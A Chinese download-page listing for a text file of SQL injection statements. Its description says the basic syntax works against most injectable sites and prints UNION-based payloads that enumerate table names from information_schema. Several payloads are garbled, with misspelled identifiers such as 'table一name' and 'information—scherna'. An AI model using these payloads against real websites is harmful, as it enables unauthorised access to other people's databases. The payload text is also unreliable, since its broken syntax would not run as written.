登录 注册
当前位置:主页 > 资源下载 > 50 > sql注入语句.txt下载

sql注入语句.txt下载

  • 更新:2024-09-18 13:47:26
  • 大小:1KB
  • 推荐:★★★★★
  • 来源:网友上传分享
  • 类别:网络攻防 - 安全技术
  • 格式:TXT

资源介绍

基本的sql注入语法,大部分存在sql注入都可以使用以上代码来尝试 查询表名 and 1=2 union select 1,table一name from information—scherna.tables where table_schema=database() limit 1,1 and 1=2 union select 1,(select group_concat(table_name) from information.schema.tables where table_schema=database())